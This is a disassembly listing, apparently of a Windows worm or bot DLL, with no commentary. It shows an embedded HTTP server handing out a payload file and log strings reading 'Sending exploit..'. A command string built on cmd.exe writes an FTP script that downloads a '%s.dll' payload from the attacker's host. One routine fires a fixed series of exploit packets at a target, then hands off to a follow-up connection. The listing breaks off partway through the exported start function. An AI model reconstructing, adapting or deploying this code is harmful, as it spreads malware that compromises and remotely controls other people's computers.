mov edx, [ebp+fd]
cmp edx, [ebp+s]
jnz loc_100035BD
mov [ebp+addrlen], 10h
lea eax, [ebp+addrlen]
push eax ; addrlen
lea ecx, [ebp+addr]
push ecx ; addr
mov edx, [ebp+s]
push edx ; s
call ds:accept ; accept
mov [ebp+var_1020], eax
cmp [ebp+var_1020], 0FFFFFFFFh
jnz short loc_10003519
jmp loc_10003495
; ---------------------------------------------------------------------------
loc_10003519: ; CODE XREF: sub_1000329E+274�j
; sub_1000329E+2FA�j
mov [ebp+var_2668], 0
jmp short loc_10003534
; ---------------------------------------------------------------------------
loc_10003525: ; CODE XREF: sub_1000329E:loc_10003559�j
mov eax, [ebp+var_2668]
add eax, 1
mov [ebp+var_2668], eax
loc_10003534: ; CODE XREF: sub_1000329E+285�j
mov ecx, [ebp+var_2668]
cmp ecx, [ebp+var_255C]
jnb short loc_1000355B
mov edx, [ebp+var_2668]
mov eax, [ebp+edx*4+var_2558]
cmp eax, [ebp+var_1020]
jnz short loc_10003559
jmp short loc_1000355B
; ---------------------------------------------------------------------------
loc_10003559: ; CODE XREF: sub_1000329E+2B7�j
jmp short loc_10003525
; ---------------------------------------------------------------------------
loc_1000355B: ; CODE XREF: sub_1000329E+2A2�j
; sub_1000329E+2B9�j
mov ecx, [ebp+var_2668]
cmp ecx, [ebp+var_255C]
jnz short loc_10003594
cmp [ebp+var_255C], 40h
jnb short loc_10003594
mov edx, [ebp+var_2668]
mov eax, [ebp+var_1020]
mov [ebp+edx*4+var_2558], eax
mov ecx, [ebp+var_255C]
add ecx, 1
mov [ebp+var_255C], ecx
loc_10003594: ; CODE XREF: sub_1000329E+2C9�j
; sub_1000329E+2D2�j
xor edx, edx
test edx, edx
jnz loc_10003519
mov eax, [ebp+var_1020]
cmp eax, [ebp+var_101C]
jbe short loc_100035B8
mov ecx, [ebp+var_1020]
mov [ebp+var_101C], ecx
loc_100035B8: ; CODE XREF: sub_1000329E+30C�j
jmp loc_100039D0
; ---------------------------------------------------------------------------
loc_100035BD: ; CODE XREF: sub_1000329E+23F�j
push 1000h ; Size
push 0 ; Val
lea edx, [ebp+Dst]
push edx ; Dst
call memset ; memset
add esp, 0Ch
push 1000h ; Size
push 0 ; Val
lea eax, [ebp+Str1]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 0 ; flags
push 1000h ; len
lea ecx, [ebp+Dst]
push ecx ; buf
mov edx, [ebp+fd]
push edx ; s
call ds:recv ; recv
test eax, eax
jg loc_100036B8
mov eax, [ebp+fd]
push eax ; s
call ds:closesocket ; closesocket
loc_10003619: ; CODE XREF: sub_1000329E+40F�j
mov [ebp+var_2E80], 0
jmp short loc_10003634
; ---------------------------------------------------------------------------
loc_10003625: ; CODE XREF: sub_1000329E:loc_100036A4�j
mov ecx, [ebp+var_2E80]
add ecx, 1
mov [ebp+var_2E80], ecx
loc_10003634: ; CODE XREF: sub_1000329E+385�j
mov edx, [ebp+var_2E80]
cmp edx, [ebp+var_255C]
jnb short loc_100036A9
mov eax, [ebp+var_2E80]
mov ecx, [ebp+eax*4+var_2558]
cmp ecx, [ebp+fd]
jnz short loc_100036A4
loc_10003657: ; CODE XREF: sub_1000329E+3F3�j
mov edx, [ebp+var_255C]
sub edx, 1
cmp [ebp+var_2E80], edx
jnb short loc_10003693
mov eax, [ebp+var_2E80]
mov ecx, [ebp+var_2E80]
mov edx, [ebp+ecx*4+var_2554]
mov [ebp+eax*4+var_2558], edx
mov eax, [ebp+var_2E80]
add eax, 1
mov [ebp+var_2E80], eax
jmp short loc_10003657
; ---------------------------------------------------------------------------
loc_10003693: ; CODE XREF: sub_1000329E+3C8�j
mov ecx, [ebp+var_255C]
sub ecx, 1
mov [ebp+var_255C], ecx
jmp short loc_100036A9
; ---------------------------------------------------------------------------
loc_100036A4: ; CODE XREF: sub_1000329E+3B7�j
jmp loc_10003625
; ---------------------------------------------------------------------------
loc_100036A9: ; CODE XREF: sub_1000329E+3A2�j
; sub_1000329E+404�j
xor edx, edx
test edx, edx
jnz loc_10003619
jmp loc_1000393D
; ---------------------------------------------------------------------------
loc_100036B8: ; CODE XREF: sub_1000329E+368�j
push 100h ; Size
push 0 ; Val
lea eax, [ebp+Str]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov [ebp+var_4], 0
mov [ebp+var_8], 0
jmp short loc_100036F0
; ---------------------------------------------------------------------------
loc_100036DE: ; CODE XREF: sub_1000329E:loc_10003938�j
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_8]
add edx, 1
mov [ebp+var_8], edx
loc_100036F0: ; CODE XREF: sub_1000329E+43E�j
lea eax, [ebp+Dst]
push eax ; Str
call strlen ; strlen
add esp, 4
cmp [ebp+var_4], eax
jnb loc_1000393D
mov ecx, [ebp+var_8]
mov edx, [ebp+var_4]
mov al, [ebp+edx+Dst]
mov [ebp+ecx+Str1], al
mov ecx, [ebp+var_4]
movsx edx, [ebp+ecx+Dst]
cmp edx, 0Ah
jnz loc_10003938
push offset SubStr ; "GET "
lea eax, [ebp+Str1]
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_100037B7
lea ecx, [ebp+Str1]
push ecx ; Str
call strlen ; strlen
add esp, 4
cmp eax, 5
jbe short loc_100037B7
push offset asc_10010AC4 ; " "
push offset asc_10010AC8 ; " "
push offset aGet_0 ; "GET "
lea edx, [ebp+Str1]
push edx ; Str
call ds:strstr ; strstr
add esp, 8
push eax ; Str
call ds:strstr ; strstr
add esp, 8
push eax ; Str
call ds:strtok ; strtok
add esp, 8
mov [ebp+Source], eax
push 0FFh ; Count
mov eax, [ebp+Source]
push eax ; Source
lea ecx, [ebp+Str]
push ecx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
jmp loc_1000391B
; ---------------------------------------------------------------------------
loc_100037B7: ; CODE XREF: sub_1000329E+4A9�j
; sub_1000329E+4BD�j
push offset asc_10010AD4 ; "\r\n"
lea edx, [ebp+Str1]
push edx ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jnz loc_1000391B
loc_100037D3: ; CODE XREF: sub_1000329E+5C9�j
mov [ebp+var_2E84], 0
jmp short loc_100037EE
; ---------------------------------------------------------------------------
loc_100037DF: ; CODE XREF: sub_1000329E:loc_1000385E�j
mov eax, [ebp+var_2E84]
add eax, 1
mov [ebp+var_2E84], eax
loc_100037EE: ; CODE XREF: sub_1000329E+53F�j
mov ecx, [ebp+var_2E84]
cmp ecx, [ebp+var_255C]
jnb short loc_10003863
mov edx, [ebp+var_2E84]
mov eax, [ebp+edx*4+var_2558]
cmp eax, [ebp+fd]
jnz short loc_1000385E
loc_10003811: ; CODE XREF: sub_1000329E+5AD�j
mov ecx, [ebp+var_255C]
sub ecx, 1
cmp [ebp+var_2E84], ecx
jnb short loc_1000384D
mov edx, [ebp+var_2E84]
mov eax, [ebp+var_2E84]
mov ecx, [ebp+eax*4+var_2554]
mov [ebp+edx*4+var_2558], ecx
mov edx, [ebp+var_2E84]
add edx, 1
mov [ebp+var_2E84], edx
jmp short loc_10003811
; ---------------------------------------------------------------------------
loc_1000384D: ; CODE XREF: sub_1000329E+582�j
mov eax, [ebp+var_255C]
sub eax, 1
mov [ebp+var_255C], eax
jmp short loc_10003863
; ---------------------------------------------------------------------------
loc_1000385E: ; CODE XREF: sub_1000329E+571�j
jmp loc_100037DF
; ---------------------------------------------------------------------------
loc_10003863: ; CODE XREF: sub_1000329E+55C�j
; sub_1000329E+5BE�j
xor ecx, ecx
test ecx, ecx
jnz loc_100037D3
lea edx, [ebp+Str]
test edx, edx
jz loc_1000390C
lea eax, [ebp+Str]
push eax ; Str
call strlen ; strlen
add esp, 4
mov esi, eax
lea ecx, [ebp+var_214A]
push ecx ; Str
call strlen ; strlen
add esp, 4
add esi, eax
cmp esi, 100h
jnb short loc_100038FD
mov [ebp+var_2E88], 0
lea edx, [ebp+var_2E88]
push edx ; argp
push 8004667Eh ; cmd
mov eax, [ebp+fd]
push eax ; s
call ds:ioctlsocket ; ioctlsocket
mov ecx, [ebp+fd]
mov [ebp+var_2048], ecx
lea edx, [ebp+Str]
push edx ; Source
sub esp, 310h
mov ecx, 0C4h
lea esi, [ebp+var_2354]
mov edi, esp
rep movsd
call sub_10002157
add esp, 314h
jmp short loc_1000390A
; ---------------------------------------------------------------------------
loc_100038FD: ; CODE XREF: sub_1000329E+605�j
mov eax, [ebp+fd]
push eax ; s
call ds:closesocket ; closesocket
loc_1000390A: ; CODE XREF: sub_1000329E+65D�j
jmp short loc_10003919
; ---------------------------------------------------------------------------
loc_1000390C: ; CODE XREF: sub_1000329E+5D7�j
mov ecx, [ebp+fd]
push ecx ; s
call ds:closesocket ; closesocket
loc_10003919: ; CODE XREF: sub_1000329E:loc_1000390A�j
jmp short loc_1000393D
; ---------------------------------------------------------------------------
loc_1000391B: ; CODE XREF: sub_1000329E+514�j
; sub_1000329E+52F�j
push 1000h ; Size
push 0 ; Val
lea edx, [ebp+Str1]
push edx ; Dst
call memset ; memset
add esp, 0Ch
mov [ebp+var_8], 0FFFFFFFFh
loc_10003938: ; CODE XREF: sub_1000329E+48C�j
jmp loc_100036DE
; ---------------------------------------------------------------------------
loc_1000393D: ; CODE XREF: sub_1000329E+415�j
; sub_1000329E+464�j ...
push offset byte_1002C868 ; Format
push offset aSSendingExpl_4 ; "%s Sending exploit.."
call sub_10007303
add esp, 8
mov [ebp+var_2E6C], 0
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_2E6B]
rep stosd
stosw
stosb
call sub_10006FA2
push eax
push offset aS_dll_5 ; "%s.dll"
push 10h ; Count
lea eax, [ebp+Dest]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
lea ecx, [ebp+Dest]
push ecx
lea edx, [ebp+Dest]
push edx
xor eax, eax
mov ax, hostshort
push eax
push offset Dest
push offset aCmd_exeCEcho_5 ; "cmd.exe /C echo open %s %hu>x&echo user"...
push 400h ; Count
lea ecx, [ebp+var_2DDD]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
mov [ebp+var_266C], eax
mov edx, dword_10012A5C
add edx, 1
mov dword_10012A5C, edx
loc_100039D0: ; CODE XREF: sub_1000329E+22D�j
; sub_1000329E:loc_100035B8�j
jmp loc_10003495
; ---------------------------------------------------------------------------
loc_100039D5: ; CODE XREF: sub_1000329E+212�j
jmp loc_10003442
; ---------------------------------------------------------------------------
loc_100039DA: ; CODE XREF: sub_1000329E+9D�j
; sub_1000329E+BC�j ...
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
push 1
mov ecx, [ebp+var_2354]
push ecx
call sub_1000AB26
add esp, 8
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
sub_1000329E endp
; ---------------------------------------------------------------------------
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; DATA XREF: sub_10002157+317�o
var_1DC4 = dword ptr -1DC4h
var_1DC0 = dword ptr -1DC0h
Source = byte ptr -1DBAh
var_1CBA = byte ptr -1CBAh
s = dword ptr -1ABAh
var_1AB4 = byte ptr -1AB4h
var_1AA4 = byte ptr -1AA4h
var_19A4 = byte ptr -19A4h
var_1970 = dword ptr -1970h
buf = byte ptr -196Ch
var_96C = byte ptr -96Ch
var_96B = byte ptr -96Bh
var_8DD = byte ptr -8DDh
DateStr = byte ptr -16Ch
TimeStr = byte ptr -124h
var_104 = dword ptr -104h
FileName = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1DC4h
call __alloca_probe
push esi
push edi
mov esi, [ebp+arg_0]
mov ecx, 0C4h
lea edi, [ebp+var_1DC4]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_1970], eax
mov ecx, [ebp+var_1970]
mov byte ptr [ecx+30Bh], 1
push 0FFh ; Count
lea edx, [ebp+Source]
push edx ; Source
lea eax, [ebp+FileName]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push 0FFh ; Count
lea ecx, [ebp+var_1CBA]
push ecx ; Source
lea edx, [ebp+var_1AA4]
push edx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
mov eax, [ebp+s]
and eax, 0FFh
test eax, eax
jz short loc_10003A9D
push 31h ; Count
push offset aTextHtml ; "text/html"
lea ecx, [ebp+var_19A4]
push ecx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
jmp short loc_10003AB4
; ---------------------------------------------------------------------------
loc_10003A9D: ; CODE XREF: StartAddress+7A�j
push 31h ; Count
push offset aApplicationOct ; "application/octet-stream"
lea edx, [ebp+var_19A4]
push edx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
loc_10003AB4: ; CODE XREF: StartAddress+93�j
push 46h ; cchDate
lea eax, [ebp+DateStr]
push eax ; lpDateStr
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push 0 ; lpDate
push 0 ; dwFlags
push 409h ; Locale
call ds:GetDateFormatA ; GetDateFormatA
push 1Eh ; cchTime
lea ecx, [ebp+TimeStr]
push ecx ; lpTimeStr
push offset aHhMmSs ; "HH:mm:ss"
push 0 ; lpTime
push 0 ; dwFlags
push 409h ; Locale
call ds:GetTimeFormatA ; GetTimeFormatA
cmp [ebp+var_1DC0], 0FFFFFFFFh
jnz short loc_10003B44
lea edx, [ebp+TimeStr]
push edx
lea eax, [ebp+DateStr]
push eax
lea ecx, [ebp+TimeStr]
push ecx
lea edx, [ebp+DateStr]
push edx
lea eax, [ebp+TimeStr]
push eax
lea ecx, [ebp+DateStr]
push ecx
lea edx, [ebp+var_19A4]
push edx
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: HTTPd\r\nCache-C"...
push 0FFFh ; Count
lea eax, [ebp+buf]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 28h
jmp short loc_10003B96
; ---------------------------------------------------------------------------
loc_10003B44: ; CODE XREF: StartAddress+ED�j
lea ecx, [ebp+TimeStr]
push ecx
lea edx, [ebp+DateStr]
push edx
lea eax, [ebp+TimeStr]
push eax
lea ecx, [ebp+DateStr]
push ecx
lea edx, [ebp+TimeStr]
push edx
lea eax, [ebp+DateStr]
push eax
mov ecx, [ebp+var_1DC0]
push ecx
lea edx, [ebp+var_19A4]
push edx
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: HTTPd\r\nCache-C"...
push 0FFFh ; Count
lea eax, [ebp+buf]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 2Ch
loc_10003B96: ; CODE XREF: StartAddress+13A�j
push 0 ; flags
lea ecx, [ebp+buf]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s+2]
push eax ; s
call ds:send ; send
push offset byte_1002C868 ; Format
push offset aSSendingExpl_5 ; "%s Sending exploit.."
call sub_10007303
add esp, 8
mov [ebp+var_96C], 0
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_96B]
rep stosd
stosw
stosb
call sub_10006FA2
push eax
push offset aS_dll_6 ; "%s.dll"
push 10h ; Count
lea ecx, [ebp+var_1AB4]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
lea edx, [ebp+var_1AB4]
push edx
lea eax, [ebp+var_1AB4]
push eax
xor ecx, ecx
mov cx, hostshort
push ecx
push offset Dest
push offset aCmd_exeCEcho_6 ; "cmd.exe /C echo open %s %hu>x&echo user"...
push 400h ; Count
lea edx, [ebp+var_8DD]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
mov [ebp+var_104], eax
mov eax, dword_10012A5C
add eax, 1
mov dword_10012A5C, eax
mov ecx, [ebp+s]
and ecx, 0FFh
test ecx, ecx
jnz short loc_10003C87
lea edx, [ebp+FileName]
push edx ; lpFileName
sub esp, 310h
mov ecx, 0C4h
lea esi, [ebp+var_1DC4]
mov edi, esp
rep movsd
call sub_100030D9
add esp, 314h
jmp short loc_10003CA4
; ---------------------------------------------------------------------------
loc_10003C87: ; CODE XREF: StartAddress+254�j
lea eax, [ebp+var_1AA4]
push eax ; Source
lea ecx, [ebp+FileName]
push ecx ; lpFileName
mov edx, [ebp+s+2]
push edx ; s
call sub_100024A5
add esp, 0Ch
loc_10003CA4: ; CODE XREF: StartAddress+27D�j
mov eax, [ebp+s+2]
push eax ; s
call ds:closesocket ; closesocket
push 1
mov ecx, [ebp+var_1DC4]
push ecx
call sub_1000AB26
add esp, 8
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
StartAddress endp
; ---------------------------------------------------------------------------
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10003CD2 proc near ; DATA XREF: .data:1000E00C�o
push ebp
mov ebp, esp
call sub_10003CE1
call sub_10003CF1
pop ebp
retn
sub_10003CD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10003CE1 proc near ; CODE XREF: sub_10003CD2+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_10012A55
call ds:??0Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::Init(void)
pop ebp
retn
sub_10003CE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10003CF1 proc near ; CODE XREF: sub_10003CD2+8�p
push ebp
mov ebp, esp
push offset sub_10003D03 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_10003CF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_10003D03()
sub_10003D03 proc near ; DATA XREF: sub_10003CF1+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_10012A55
call ds:??1Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::~Init(void)
pop ebp
retn
sub_10003D03 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10003D13 proc near ; DATA XREF: .data:1000E010�o
push ebp
mov ebp, esp
call sub_10003D22
call sub_10003D32
pop ebp
retn
sub_10003D13 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10003D22 proc near ; CODE XREF: sub_10003D13+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_10012A54
call ds:??0_Winit@std@@QAE@XZ ; std::_Winit::_Winit(void)
pop ebp
retn
sub_10003D22 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10003D32 proc near ; CODE XREF: sub_10003D13+8�p
push ebp
mov ebp, esp
push offset sub_10003D44 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_10003D32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_10003D44()
sub_10003D44 proc near ; DATA XREF: sub_10003D32+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_10012A54
call ds:??1_Winit@std@@QAE@XZ ; std::_Winit::~_Winit(void)
pop ebp
retn
sub_10003D44 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10003D60 proc near ; DATA XREF: sub_1000A1A9+2BD�o
to = sockaddr ptr -4E44h
buf = byte ptr -4E34h
hostshort = word ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
s = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 4E44h
call __alloca_probe
mov eax, [ebp+arg_0]
mov ecx, [eax]
mov dword ptr [ebp+hostshort], ecx
mov edx, [eax+4]
mov [ebp+var_10], edx
mov eax, [eax+8]
mov [ebp+var_C], eax
mov ecx, [ebp+arg_0]
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
mov byte ptr [edx+8], 1
push 0 ; protocol
push 1 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0FFFFFFFFh
jnz short loc_10003DB5
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
xor eax, eax
jmp loc_1000414D
; ---------------------------------------------------------------------------
loc_10003DB5: ; CODE XREF: sub_10003D60+41�j
mov [ebp+to.sa_family], 2
mov eax, [ebp+var_10]
mov dword ptr [ebp+to.sa_data+2], eax
mov cx, [ebp+hostshort]
push ecx ; hostshort
call ds:htons ; htons
mov word ptr [ebp+to.sa_data], ax
push 8 ; Size
push 0 ; Val
lea edx, [ebp+to.sa_data+6]
push edx ; Dst
call memset ; memset
add esp, 0Ch
push 10h ; namelen
lea eax, [ebp+to]
push eax ; name
mov ecx, [ebp+s]
push ecx ; s
call ds:connect ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_10003E16
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
xor eax, eax
jmp loc_1000414D
; ---------------------------------------------------------------------------
loc_10003E16: ; CODE XREF: sub_10003D60+A2�j
push 10h ; tolen
lea edx, [ebp+to]
push edx ; to
push 0 ; flags
push 48h ; len
push offset aB ; ""
mov eax, [ebp+s]
push eax ; s
call ds:sendto ; sendto
push 0 ; flags
push 4E20h ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:recv ; recv
push 10h ; tolen
lea eax, [ebp+to]
push eax ; to
push 0 ; flags
push 58h ; len
push offset byte_10010E7C ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:sendto ; sendto
push 0 ; flags
push 4E20h ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:recv ; recv
push 10h ; tolen
lea ecx, [ebp+to]
push ecx ; to
push 0 ; flags
push 0B9h ; len
push offset byte_10010ED4 ; buf
mov edx, [ebp+s]
push edx ; s
call ds:sendto ; sendto
push 0 ; flags
push 4E20h ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:recv ; recv
push 10h ; tolen
lea edx, [ebp+to]
push edx ; to
push 0 ; flags
push 108h ; len
push offset byte_10010F90 ; buf
mov eax, [ebp+s]
push eax ; s
call ds:sendto ; sendto
push 0 ; flags
push 4E20h ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:recv ; recv
push 10h ; tolen
lea eax, [ebp+to]
push eax ; to
push 0 ; flags
push 3Eh ; len
push offset byte_10011098 ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:sendto ; sendto
push 0 ; flags
push 4E20h ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:recv ; recv
push 10h ; tolen
lea ecx, [ebp+to]
push ecx ; to
push 0 ; flags
push 60h ; len
push offset byte_100110D8 ; buf
mov edx, [ebp+s]
push edx ; s
call ds:sendto ; sendto
push 0 ; flags
push 4E20h ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:recv ; recv
push 10h ; tolen
lea edx, [ebp+to]
push edx ; to
push 0 ; flags
push 96h ; len
push offset byte_10011138 ; buf
mov eax, [ebp+s]
push eax ; s
call ds:sendto ; sendto
push 0 ; flags
push 4E20h ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:recv ; recv
push 10h ; tolen
lea eax, [ebp+to]
push eax ; to
push 0 ; flags
push 15Bh ; len
push offset byte_100111D0 ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:sendto ; sendto
push 0 ; flags
push 4E20h ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:recv ; recv
push 10h ; tolen
lea ecx, [ebp+to]
push ecx ; to
push 0 ; flags
push 15Bh ; len
push offset byte_1001132C ; buf
mov edx, [ebp+s]
push edx ; s
call ds:sendto ; sendto
push 0 ; flags
push 4E20h ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:recv ; recv
push 10h ; tolen
lea edx, [ebp+to]
push edx ; to
push 0 ; flags
push 15Bh ; len
push offset byte_10011488 ; buf
mov eax, [ebp+s]
push eax ; s
call ds:sendto ; sendto
push 0 ; flags
push 4E20h ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:recv ; recv
push 10h ; tolen
lea eax, [ebp+to]
push eax ; to
push 0 ; flags
push 6Ah ; len
push offset byte_100115E4 ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:sendto ; sendto
push 0 ; flags
push 4E20h ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:recv ; recv
push 10h ; tolen
lea ecx, [ebp+to]
push ecx ; to
push 0 ; flags
push 15Bh ; len
push offset byte_10011650 ; buf
mov edx, [ebp+s]
push edx ; s
call ds:sendto ; sendto
push 0 ; flags
push 4E20h ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:recv ; recv
push 10h ; tolen
lea edx, [ebp+to]
push edx ; to
push 0 ; flags
push 15Bh ; len
push offset byte_100117AC ; buf
mov eax, [ebp+s]
push eax ; s
call ds:sendto ; sendto
push 0 ; flags
push 4E20h ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:recv ; recv
push 10h ; tolen
lea eax, [ebp+to]
push eax ; to
push 0 ; flags
push 15Bh ; len
push offset byte_10011908 ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:sendto ; sendto
push 0 ; flags
push 4E20h ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:recv ; recv
push 10h ; tolen
lea ecx, [ebp+to]
push ecx ; to
push 0 ; flags
push 6Ah ; len
push offset byte_10011A64 ; buf
mov edx, [ebp+s]
push edx ; s
call ds:sendto ; sendto
push 0D431h ; hostshort
mov eax, [ebp+var_10]
push eax ; int
call sub_10009CEB
add esp, 8
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
xor eax, eax
loc_1000414D: ; CODE XREF: sub_10003D60+50�j
; sub_10003D60+B1�j
mov esp, ebp
pop ebp
retn 4
sub_10003D60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004153 proc near ; DATA XREF: .data:1000E014�o
push ebp
mov ebp, esp
call sub_10004162
call sub_10004172
pop ebp
retn
sub_10004153 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004162 proc near ; CODE XREF: sub_10004153+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_10012A65
call ds:??0Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::Init(void)
pop ebp
retn
sub_10004162 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004172 proc near ; CODE XREF: sub_10004153+8�p
push ebp
mov ebp, esp
push offset sub_10004184 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_10004172 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_10004184()
sub_10004184 proc near ; DATA XREF: sub_10004172+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_10012A65
call ds:??1Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::~Init(void)
pop ebp
retn
sub_10004184 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10004194 proc near ; DATA XREF: .data:1000E018�o
push ebp
mov ebp, esp
call sub_100041A3
call sub_100041B3
pop ebp
retn
sub_10004194 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100041A3 proc near ; CODE XREF: sub_10004194+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_10012A64
call ds:??0_Winit@std@@QAE@XZ ; std::_Winit::_Winit(void)
pop ebp
retn
sub_100041A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100041B3 proc near ; CODE XREF: sub_10004194+8�p
push ebp
mov ebp, esp
push offset sub_100041C5 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_100041B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_100041C5()
sub_100041C5 proc near ; DATA XREF: sub_100041B3+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_10012A64
call ds:??1_Winit@std@@QAE@XZ ; std::_Winit::~_Winit(void)
pop ebp
retn
sub_100041C5 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; BOOL __stdcall DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved)
_DllMain@12 proc near ; CODE XREF: DllEntryPoint+4B�p
hModule = dword ptr 8
fdwReason = dword ptr 0Ch
lpvReserved = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+fdwReason], 1
jz short loc_100041F0
mov eax, 1
jmp short loc_10004209
; ---------------------------------------------------------------------------
loc_100041F0: ; CODE XREF: DllMain(x,x,x)+7�j
push 100h ; nSize
push offset ExistingFileName ; lpFilename
mov eax, [ebp+hModule]
push eax ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
mov eax, 1
loc_10004209: ; CODE XREF: DllMain(x,x,x)+E�j
pop ebp
retn 0Ch
_DllMain@12 endp
; Exported entry 1. start
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
Str = byte ptr -1810h
File = dword ptr -17ACh
WSAData = WSAData ptr -17A8h
buf = byte ptr -1618h
var_618 = dword ptr -618h
Count = dword ptr -614h
Source = byte ptr -610h
var_410 = dword ptr -410h
